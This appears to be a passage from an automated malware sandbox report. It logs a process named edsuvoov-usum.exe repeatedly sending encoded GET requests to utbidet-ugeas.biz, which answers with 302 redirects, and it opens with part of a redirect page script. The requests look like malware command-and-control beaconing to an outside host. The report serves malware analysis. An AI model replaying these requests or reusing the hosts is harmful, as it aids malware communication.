                                                                                                                                                                                                            Data Ascii: <html><head><script>var forwardingUrl = "/page/bouncy.php?&bpae=GbhGdicGokx7j2%2FtWlplcMLHLjd9FJvmGWEqdhkqJh3XJe0DBLxqaUMfhxS757i9%2FsduXb9QXTvYHhGu%2FHWlbiqLFJ82sNCztiSAquxEWi5FGRBSNHwcSGKpZB9VrY5zelDkDFZd8zTLxbEYRElW%2FNLkQNrCJj9NczvXizqwYxUpLHpHXMGEjEyCx7gHhiLKjcc4tMxR1quZXBkneAYtSk2bBBdiDISI51N2XzKjTGNdyrTaZgRQ4udGKvPMxTilGZqdAkHexGUv0ToB28QroUSF87OqeuI4VfQN6h1UZMtwnv24R6d%2FgydH4ywfNULxiB20bb9MaRdynIhevzXKBLLA3qnB5hBEgwzSxR1Wg8v7ET0W2B8IW5ojYLrdQKGOAjBzuIV%2B%2BBXfRhnyrpg%3D&redirectType=js";var destinationUrl = "/page/bouncy.php?&bpae=GbhGdicGokx7j2%2FtWlplcMLHLjd9FJvmGWEqdhkqJh3XJe0DBLxqaUMfhxS757i9%2FsduXb9QXTvYHhGu%2FHWlbiqLFJ82sNCztiSAquxEWi5FGRBSNHwcSGKpZB9VrY5zelDkDFZd8zTLxbEYRElW%2FNLkQNrCJj9NczvXizqwYxUpLHpHXMGEjEyCx7gHhiLKjcc4tMxR1quZXBkneAYtSk2bBBdiDISI51N2XzKjTGNdyrTaZgRQ4udGKvPMxTilGZqdAkHexGUv0ToB28QroUSF87OqeuI4VfQN6h1UZMtwnv24R6d%2FgydH4ywfNULxiB20bb9MaRdynIhevzXKBLLA3qnB5hBEgwzSxR1Wg8v7ET0W2B8IW5ojYLrdQKGOAjBzuIV%2B%2BBXfRhnyrpg%3D&redire
                                                                                                                                                                                                            Sep 7, 2024 15:35:23.450212002 CEST919INData Raw: 63 74 54 79 70 65 3d 6d 65 74 61 22 3b 0a 09 09 09 76 61 72 20 61 64 64 44 65 74 65 63 74 69 6f 6e 20 3d 20 74 72 75 65 3b 0a 09 09 09 69 66 20 28 61 64 64 44 65 74 65 63 74 69 6f 6e 29 20 7b 0a 09 09 09 09 76 61 72 20 69 6e 49 66 72 61 6d 65 20
                                                                                                                                                                                                            Data Ascii: ctType=meta";var addDetection = true;if (addDetection) {var inIframe = window.self !== window.top;forwardingUrl += "&inIframe=" + inIframe;var inPopUp = (window.opener !== undefined && window.opener !== null && window.op


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            79192.168.2.361431172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:23.460443020 CEST169OUTGET /d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F30C HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:23.942939997 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:23 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F30C
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            80192.168.2.361432172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:23.981574059 CEST201OUTGET /d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F30C HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:24.468375921 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:24 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F30C
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            81192.168.2.361434172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:25.692785978 CEST169OUTGET /d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:26.198714972 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            82192.168.2.361435172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:26.205091953 CEST201OUTGET /d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:26.689641953 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            83192.168.2.361437172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:28.316346884 CEST169OUTGET /d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156C70 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:28.819891930 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:28 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156C70
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            84192.168.2.361438172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:28.827173948 CEST201OUTGET /d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156C70 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:29.328645945 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156C70
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            85192.168.2.361440172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:32.054176092 CEST169OUTGET /d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A2038A HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:32.550985098 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A2038A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            86192.168.2.361441172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:32.559194088 CEST201OUTGET /d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A2038A HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:33.043735027 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A2038A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            87192.168.2.361443172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:35.161819935 CEST169OUTGET /d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:35.661936998 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            88192.168.2.361444172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:35.669734001 CEST201OUTGET /d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:36.181003094 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:36 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            89192.168.2.361446172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.460474014 CEST169OUTGET /d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148372 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.944184065 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:39 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148372
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            90192.168.2.361447172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.969407082 CEST201OUTGET /d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148372 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:40.460124969 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148372
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            91192.168.2.36144845.79.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
